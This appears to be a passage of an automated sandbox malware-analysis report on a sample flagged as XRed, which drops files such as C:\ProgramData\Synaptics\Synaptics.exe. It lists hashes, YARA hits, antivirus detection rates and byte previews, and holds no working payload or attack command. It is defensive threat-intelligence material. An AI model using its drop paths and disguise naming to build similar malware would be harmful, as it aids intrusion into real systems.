                                                                                            MD5:47151B610E6F89ADB45B36CF02DB03DB
                                                                                            SHA1:A019871C4A5D51973740D789B175911DC9FE66B4
                                                                                            SHA-256:A60DD86CE69AAD0D268DE87930CDD1A24233B8C4F34C5305C2CD008A653FEE32
                                                                                            SHA-512:211CD8126C01F9CB1B31E849B816113EFE6ABB50A78EB47DFFC83C1727B11A734ED8CABD0EB4356F0FBBC40593D51859271DA545680E63FFA2FB6CD88331C718
                                                                                            Malicious:false
                                                                                            Preview:MDMP..a..... .......J.vg............tG...............N......$...0n......D..............`.......8...........T.................A.........Tn..........@p..............................................................................eJ.......p......GenuineIntel............T....... .....vg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):6304
                                                                                            Entropy (8bit):3.717267783398188
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:R6l7wVeJCxO69uUqYiSqSgpD089borsfc4m:R6lXJr6WYSpowfS
                                                                                            MD5:DF92C9DE6A56DC17D45D1976BDA8E2DA
                                                                                            SHA1:497D7FE74755030F7B151BA2E2CE2C7148FD21B2
                                                                                            SHA-256:1999BA8B265A446808BB523D4EB39E83693C8A9946F2C2532C3B810C7D7110C3
                                                                                            SHA-512:E5F9C282A899AD0C7CA3398203C228614544AE0975EFABD311190B4405D9463C47D3982353A05ECF1CD026E307B1121D4470EB902677CAE8AE541DCCE9C37F0E
                                                                                            Malicious:false
                                                                                             Preview:<?xml version="1.0" encoding="UTF-16"?>..<WERReportMetadata>...<OSVersionInformation>....<WindowsNTVersion>10.0</WindowsNTVersion>....<Build>19045</Build>....<Product>(0x30): Windows 10 Pro</Product>....<Edition>Professional</Edition>....<BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>....<Revision>2006</Revision>....<Flavor>Multiprocessor Free</Flavor>....<Architecture>X64</Architecture>....<LCID>2057</LCID>...</OSVersionInformation>...<ProcessInformation>....<Pid>7712</Pi
                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4572
                                                                                            Entropy (8bit):4.4452273796332165
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:cvIwWl8zs+Jg77aI9ADWpW8VY3AYm8M4JFWFy+q84s5OuZid:uIjf0I76y7VQJzwOuZid
                                                                                            MD5:23AAFD0C7B65A384C4C34EEF933BCE6C
                                                                                            SHA1:F840873AF00437994615BA9DAB0C75CDCA0405EC
                                                                                            SHA-256:93739F6F675B0D64EA4E276028ED19C266696FF836707466CF1BFEEA1DF01435
                                                                                            SHA-512:4B2F918AA1A44CB71C4E0E6054E61ABF8DD2EEADE64814515AD79C6789C3248FCE7D333BEFC7562D076CFE6A1E844ECBAA89596286B9706D24E865518ABB6081
                                                                                            Malicious:false
                                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="658713" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                            Category:modified
                                                                                            Size (bytes):771584
                                                                                            Entropy (8bit):6.6264053582391735
                                                                                            Encrypted:false
                                                                                            SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9IIr:ansJ39LyjbJkQFMhmC+6GD9j
                                                                                            MD5:7407C51DD7AC30C4D79658D991A8B5D6
                                                                                            SHA1:B48603F6A1DFFAB2FF458780025F6A3C2E523C3C
                                                                                            SHA-256:1316730BBC50851C02F53254F9C57B99AF50A07BB0776332D1480BABD626F39A
                                                                                            SHA-512:38334452808E5D203B287E2F4A47B8F5BBCE1ED18FABCFA4A61B8C04429150DFBFFE2241323B3C87D90ABBABBED49A5CEA584CC1CE83BF519BB728E1D6AC18EB
                                                                                            Malicious:true
                                                                                            Yara Hits:
                                                                                            • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\RCX3CE.tmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\RCX3CE.tmp, Author: Joe Security
                                                                                            Antivirus:
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 94%
                                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................&....................@.......................... ...................@..............................B*...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):6490624
                                                                                            Entropy (8bit):7.9488402694147355
                                                                                            Encrypted:false
                                                                                            SSDEEP:196608:jLb7wqheSVYK/bua/BlWWnuVhsus8nm+q42:j/8qgSmIbr/Asb8nmFD
                                                                                            MD5:E819C37952E89FF0F473FA9B59CD771D
                                                                                            SHA1:DE2A344ED3A2B1F4E0FBD4E684170DB56903763E
                                                                                            SHA-256:05F954E37982086A48A222726B8134FBEF0CAA78DBE1B66A3D4479B712D12012
                                                                                            SHA-512:1E3EFF7391308A5161B75AB47EF29178A53CE08693C63FD08F5F1443CEEED87C3B4D3779265D669A91AF0192EB556913BCBF77B825678580E44FCEEB3C76D148
                                                                                            Malicious:true
                                                                                            Yara Hits:
                                                                                            • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                            Antivirus:
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 92%
                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):26
                                                                                            Entropy (8bit):3.95006375643621
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:ggPYV:rPYV
                                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                            Malicious:true
                                                                                            Preview:[ZoneTransfer]....ZoneId=0
                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1652
                                                                                            Entropy (8bit):5.239501008666114
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:GgsF+0QSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+f+pAZewRDK4mW
                                                                                            MD5:2BF5FA639EB2786222A45637DDD7836C
                                                                                            SHA1:21E0D9A0A11D75B177552E97F7F5DC28BD5DC0D3
                                                                                            SHA-256:CBC927B069555FFD076C05CAD4798F562AF8C03D6DA91438AAA4DBB5CDDE6AF1
                                                                                            SHA-512:D75C6741C66A8D3BFA6A3F79EDE5228EC58B3DF460E18E5E0AB88A213DE709B44A470FC29A6E66DD36870527D2FAC41E6897880467BD7ADED185F9B1E0959371
                                                                                            Malicious:false
                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="0tS8m7r2Udpl0dKt5niGzg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1652
                                                                                            Entropy (8bit):5.253059363712217
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:GgsF+0jzSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Yz+pAZewRDK4mW
                                                                                            MD5:11821AF6D5B0B0B42E028050DD535635
                                                                                            SHA1:E9B37724A69EBAE1FB1E507A050E102CAA37E0C9
                                                                                            SHA-256:690084F4D650F5B9A835CD1D853A44FC46AB8DC5A3B4B2DC5A557019AED48504
                                                                                            SHA-512:B517ED1E23135325939E1B276F5B32987D0567C36B4B41B436FEB9FD0A8AA6C0287544CDD5A0278629F65D106C108F0AA1CC8E89AB93105C96D237DB2978301E
                                                                                            Malicious:false
                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1652
                                                                                            Entropy (8bit):5.265101220616923
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:GgsF+04SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+r+pAZewRDK4mW
                                                                                            MD5:DF7C13394DE09DB939902B071ECF52DE
                                                                                            SHA1:C1875D4DF7A0FAB3AFD48F0A988ADE1569CBE399
                                                                                            SHA-256:5EE978ED29D1B88F3DC1809E1B4F4503EB637A45759E1E51F7B11645F6F855B5
                                                                                            SHA-512:730E14138C5DCB80740A6AB90FC9DBB3C2A47078F297BA211A5B79A18B30297D05E6CFC6BE2EAD5A52EA894C6A35EAF22FA5C3D9D7BAC41E7426E754D582199B
                                                                                            Malicious:false
                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1652
                                                                                            Entropy (8bit):5.2623432607256735
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:GgsF+08qHqISU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+0HqI+pAZewRDK4mW
                                                                                            MD5:5FE73AB1C17762AF662EA7C741AD366D
                                                                                            SHA1:286D4CEF70F358A4EC602F79079E0D4B7E634355
                                                                                            SHA-256:BF7B445F93B673AB25AE68A111A68C7B96650C2C62C37F28F5E7D942DD2A6446
                                                                                            SHA-512:45FC843DC955CDD1A9B157303E0C6C7AD1BA3C8D9B7B1415DFE3B4B75F38739A7F36C28D409AAFB1136F5D8E489CBBFB6A67B3341B0BCC3314FB28A8F2AC47AC
                                                                                            Malicious:false
                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1652
                                                                                            Entropy (8bit):5.269222460234289
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:GgsF+0GgSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Tg+pAZewRDK4mW
                                                                                            MD5:8BD7DB0CA1852FD809956E6D8146C7C0
                                                                                            SHA1:C4FB53FF0F8D9DA9EE0275872C0D09F276D71A6E
                                                                                            SHA-256:DF5E768268938E601A48454F1328C85E09F77BEBF36DB1471EA4AB80C74A58E7
                                                                                            SHA-512:167EF6AAAD2E352ED5AEB9A0DAA7EC5D5711AB664DFFDB1297DC1CB0BA477E2FA4DCE573A99759E89FDA0344461376D48F2B8B5141C7D0B9BE5F126E4E256B01
                                                                                            Malicious:false
                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1652
                                                                                            Entropy (8bit):5.2555620575046476
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:GgsF+0SSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+d+pAZewRDK4mW
                                                                                            MD5:7C453115FDF721B88697AA03CB6D5B36
                                                                                            SHA1:65A614EC83CC2B7DED7D5ADF48349A676FD1C749
                                                                                            SHA-256:FAF557AAE7BC90A0954717B80D2D120895A1BACCCB7B740A63D42F5BA53C9086
                                                                                            SHA-512:BA08A3CAA7CBE8A090760833D46F0E8370AE1826F58355111B712D65B7D3EC4142E874F3B72343670093F4AD8E2418C4F7C1362B6A985F620F9ED6F947CCC3F3
                                                                                            Malicious:false
                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1652
                                                                                            Entropy (8bit):5.2651839672627805
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:GgsF+0QOWSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+1OW+pAZewRDK4mW
                                                                                            MD5:CB81CB0146FB8345F215DA7D02F4766F
                                                                                            SHA1:DC18EB82650ED04CE197A4910CA11C31B30C4EAC
                                                                                            SHA-256:A0249FA3CADE96A5D7AADED40A9E4DD43AD1E7BE25BBAC0E977FF86CE2904D00
                                                                                            SHA-512:8DD5DE739418E2261EC3576FADAC8673B2560CC4F99534B8112384C28E19A30D3160E228943A791612770F730A3954F1B818DDE20BE913EE73ACC5AE11B5EBD7
                                                                                            Malicious:false
                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1652
                                                                                            Entropy (8bit):5.255120626943478
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:GgsF+036SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+G6+pAZewRDK4mW
                                                                                            MD5:8C9C26F51DAC9F972D7931E4226EA49C
                                                                                            SHA1:BC2FE37F4F7575B8E03EE20806D836B869CB89CA
                                                                                            SHA-256:7BF4F9351D5A34A9D6502277DA70692123A6C796D05061A3AE3DCA1FC37D7DE9
                                                                                            SHA-512:4C49FC2F86BEC28832DD3626AA3646D6DF2D3D8CC48EEC163E6A0FA608860B1D882756F76CD4DAC9F6201A68F6FBAF98E639D29C4187E263913E6B23972F4B3C
                                                                                            Malicious:false
                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1652
                                                                                            Entropy (8bit):5.262181928115323
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:GgsF+0Xr7eSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+yr7e+pAZewRDK4mW
                                                                                            MD5:33DA394E4D9A86B1C5FA618DBC988915
                                                                                            SHA1:6232CF3E79448D9CECCCE5F1670EC18D3BF037B6
                                                                                            SHA-256:816A282D344ED82263381FAD369492E9B5E4B049F6E4810C95171211E29B4904
                                                                                            SHA-512:5EEE3CF4D3E204C067A3E50423BACE1AE6DEDF6243EF9AE67447DA0C20ECE2E85807165605DBC2B863F0F6B53BB6B34E6D35FD88C137286FFAF70A0965E685D8
                                                                                            Malicious:false
                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1652
                                                                                            Entropy (8bit):5.254220355445165
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:GgsF+0MSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+z+pAZewRDK4mW
                                                                                            MD5:72C9BA0CA3D21871A0F998871F8CB5BC
                                                                                            SHA1:CFB984715C03DEED0E0C821BBD1228FF6AE8F4C2
                                                                                            SHA-256:F1E87ECBD9BDE6C9BFFB228894832C61AF7389CA0ED18A412EB0E0CC166C8E07
                                                                                            SHA-512:74AF1FDCA3E2E00F61F4EE020C988DB1627B628AC3DEB49FFBC83EBB1EBF1CB10BEC52C039FD1A1221843AE598A810804CCD4C9AEC3E436959E0B73439B3EBF9
                                                                                            Malicious:false
                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1652
                                                                                            Entropy (8bit):5.256761159536325
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:GgsF+0kbDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+x+pAZewRDK4mW
                                                                                            MD5:D9761BE8A5AC863E4C9B5585ADE2C590
                                                                                            SHA1:0C2D8F1BC89C0118DD991C44CE0F0F6C768FC2E0
                                                                                            SHA-256:D45C0F9C5729FF45C704B19DFD4ACCBE9C04F9DBCFE40DBA7187FE69770396A7
                                                                                            SHA-512:B02A2678BB91F6C9DB7AD2B008D4A7A56AFC4324CE2956A82A932A15EBDA11AD76C1A1D14AD89198DA8E0DCDC48B31FE6069893DDD20EE4F7CD835F1B1CCEF90
                                                                                            Malicious:false
                                                                                            Process:C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exe
                                                                                            File Type:HTML document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):16118
                                                                                            Entropy (8bit):3.6434775915277604
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:7Ddx3KOTczFQ21Kp4n5DTx1iDecPeLHLHQFJFjZWblWUxFzJzcKHjT:fdsOT01KcBUFJFEWUxFzvHH
                                                                                            MD5:CD131D41791A543CC6F6ED1EA5BD257C
                                                                                            SHA1:F42A2708A0B42A13530D26515274D1FCDBFE8490
                                                                                            SHA-256:E139AF8858FE90127095AC1C4685BCD849437EF0DF7C416033554703F5D864BB
                                                                                            SHA-512:A6EE9AF8F8C2C7ACD58DD3C42B8D70C55202B382FFC5A93772AF7BF7D7740C1162BB6D38A4307B1802294A18EB52032D410E128072AF7D4F9D54F415BE020C9A
                                                                                            Malicious:false
                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1652
                                                                                            Entropy (8bit):5.260447060091902
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:GgsF+0UufSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+W+pAZewRDK4mW
                                                                                            MD5:3018ABDC8521D274F0B88997B66C7AAA
                                                                                            SHA1:3B68C6CF8ED52964617BA96843BDFDA221BF4D93
                                                                                            SHA-256:D1CF06701E60B5F7E393070F15ADFB4ABCAA2D6C9B7D18DD042FEB95C6B0B140
                                                                                            SHA-512:C0961715226DF19ABC5108D1E5699FF36F79C978D54401311BE896D294C1D7FE6092BA6FBEA2DE17851CD5E936BB1FF544F4656BBA7AED2FE3F2C4120AEFD8A7
                                                                                            Malicious:false
                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1652
                                                                                            Entropy (8bit):5.254484489293086
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:GgsF+0OqSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+E+pAZewRDK4mW
                                                                                            MD5:244561A88AF7B99CAAA738F850CD5261
                                                                                            SHA1:98674DB30213D5E949838129C32A494E56B17B8E
                                                                                            SHA-256:04635F85685E7F90B510F722795A09BF7B16ACC4D4C5C9B29EC7399DAC839DED
                                                                                            SHA-512:BD52F9C371AA5979336F94A85EC3BEF3DCC952C3D9AF491A0271E3ECF6E9B90D26BB7E4EF8A3C99EC23C622239383BE90D986839E4A04F52CD4AB74B8F3CE293
                                                                                            Malicious:false
                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1652
                                                                                            Entropy (8bit):5.265705514224978
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:GgsF+05zSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+2+pAZewRDK4mW
                                                                                            MD5:827B101A43989ADA8D07EEDD247B9333
                                                                                            SHA1:F6EA8C8A63C64393804184249FDE22AE10FA7E5F
                                                                                            SHA-256:6BC19FEA0CB05C07A102BD2F495301C6E31454010029B002337C6B0828CD2CD9
                                                                                            SHA-512:885A1FA4FD234A2AC9BD3887FA1984350B31BCE054D1D86082752D292B858A92B99218B35CEBB09AEB467B29C2B4AA4B24130BD88CB93F6CF4F7C73927154C57
                                                                                            Malicious:false
                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1652
                                                                                            Entropy (8bit):5.261904824646331
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:GgsF+0kSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+D+pAZewRDK4mW
                                                                                            MD5:DFF4EFEA34D2D818013559FA261D9592
                                                                                            SHA1:A634D37DAC6E5590A5ED53D6DC4DDBCAE5820CDC
                                                                                            SHA-256:5CFE72423E8D72CCFE3150E4EB0D5382E5EDC1D8D446AA32EB52D2B7C15ADEF5
                                                                                            SHA-512:E981528D7219C1299EE292F2BC5D718DC1680414315B9C4063856163F51E5F27E2CB75B400A069823B9CC07CC48D55CE4AC6076EB7E07AFDE9970D6AC10748D0
                                                                                            Malicious:false
                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1652
                                                                                            Entropy (8bit):5.24941429541812
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:GgsF+0h4SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+W4+pAZewRDK4mW
                                                                                            MD5:2A5719D95A6CBBAB2463FABA099273C9
                                                                                            SHA1:C056EDE6BA4C1929582D1516D10C4FEEA86BA474
                                                                                            SHA-256:EC936EF972B10405BFBF664A7B7E146ABDA655477DA82051F660338F0AC9D0F4
                                                                                            SHA-512:D5455863FCD356E7EFBCAE471F5A7669E9C59A05159714E99B206346E7833E9A87A2E339FD3DF0C239907764B578FC6EF0E76194803271BECE1D0BCC4DE27562
                                                                                            Malicious:false
                                                                                            Process:C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exe
                                                                                            File Type:HTML document, Unicode text, UTF-16, little-endian text, with very long lines (322), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):29384
                                                                                            Entropy (8bit):3.7121023497225725
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:7Ddx3KOTczFQ21Kp4n5DTx1iDecPeLHLHQFJFjZWblWUxFzJzcKHjyh+4FrCakb:fdsOT01KcBUFJFEWUxFzvHelFrCakb
                                                                                            MD5:690E4BF6EADC41B22069DF97D31C7E62
                                                                                            SHA1:F2655F5EA6526AA2E7731705A82EADADCA885A21
                                                                                            SHA-256:136E682F9A96BC5CBDA8DA35983EA273648302C7B363C1C05D548E4CF6A2D3E8
                                                                                            SHA-512:EFA92C23B4440212AAB73F9BB8F6B670B29199F64190B0F2B5755C3DF219F9251126F44A710E3725A010A2A7CBA002A9929D80DA7A6CF2F890BA5CBE5F01C9B7
                                                                                            Malicious:false
                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1652
                                                                                            Entropy (8bit):5.258295429965755
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:GgsF+0Lv8SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+20+pAZewRDK4mW
                                                                                            MD5:73B2852003122B961757DEC169B0CF1B
                                                                                            SHA1:670D505423FECC6214E1DF97B240A8DED1520F19
                                                                                            SHA-256:7B5A1F74DF74451C1AE7BF5751EB842173E37A16059EB3209030BD7D0B35CA7E
                                                                                            SHA-512:96ED461AFFCBAD5071E7859CC00051300BCBC1E4E6BF1485C5CD6CE4DBF72662BC665C9A0AD436162956E9565C28C47EA523E982FDAF0CC460E3642AD4C6434D
                                                                                            Malicious:false
                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1652
                                                                                            Entropy (8bit):5.271179337934484
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:GgsF+0bSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+U+pAZewRDK4mW
                                                                                            MD5:21ABF79DA5CFBDBD81BAE43B7DF9A86B
                                                                                            SHA1:061EAF7AD41A08D5C6DC16132F8BDED6DB8C637F
                                                                                            SHA-256:78F767E5DAA28F8928546372C6306E8557258490768B2140DAEB2AC2E27C5A16
                                                                                            SHA-512:37F5B4C82125E4F2C7551159B9548C532D35022F1A682519D207993F42E81D83E28438C52E4368656C19C4194D45C0E5AE9D971EA1BB8CC2A4D32EE72AFFE147
                                                                                            Malicious:false
                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="EL02tItUBBjLEDbzZs4N4Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1652
                                                                                            Entropy (8bit):5.255338591118692
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:GgsF+0sSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+j+pAZewRDK4mW
                                                                                            MD5:B98C084240A71BE6337DBDF2961018BA
                                                                                            SHA1:7781B2005F5E03CAED1219BF9BA6AA6232626F93
                                                                                            SHA-256:E309CCF57C0365DFA320E6EE0A069F2EA754C245AF0AAB197E2DB4026FEA576E
